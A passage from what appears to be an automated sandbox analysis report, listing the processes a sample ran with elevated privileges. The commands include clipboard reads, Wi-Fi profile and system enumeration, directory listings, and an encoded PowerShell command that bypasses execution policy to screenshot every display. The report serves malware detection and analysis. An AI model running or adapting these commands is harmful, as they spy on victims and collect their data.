                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell Get-Clipboard
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                          Start time:04:44:08
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                          Start time:04:44:08
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                          Start time:04:44:08
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                                                                                                          Imagebase:0x7ff7f6760000
                                                                                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                          Start time:04:44:09
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                          Start time:04:44:09
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                                                                          Start time:04:44:09
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                          Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:35
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                                                                                                          Imagebase:0x7ff7f6760000
                                                                                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:systeminfo
                                                                                                                                                                                                                                          Imagebase:0x7ff7458c0000
                                                                                                                                                                                                                                          File size:110'080 bytes
                                                                                                                                                                                                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:37
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:netsh wlan show profile
                                                                                                                                                                                                                                          Imagebase:0x7ff6a29c0000
                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                          Imagebase:0x7ff788560000
                                                                                                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:39
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:40
                                                                                                                                                                                                                                          Start time:04:44:10
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                                                                          Start time:04:44:11
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:tree /A /F
                                                                                                                                                                                                                                          Imagebase:0x7ff7f6760000
                                                                                                                                                                                                                                          File size:20'992 bytes
                                                                                                                                                                                                                                          MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                                                                          Start time:04:44:11
                                                                                                                                                                                                                                          Start date:15/11/2024
                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                          Imagebase:0x7ff602d80000
                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                          Target ID:43
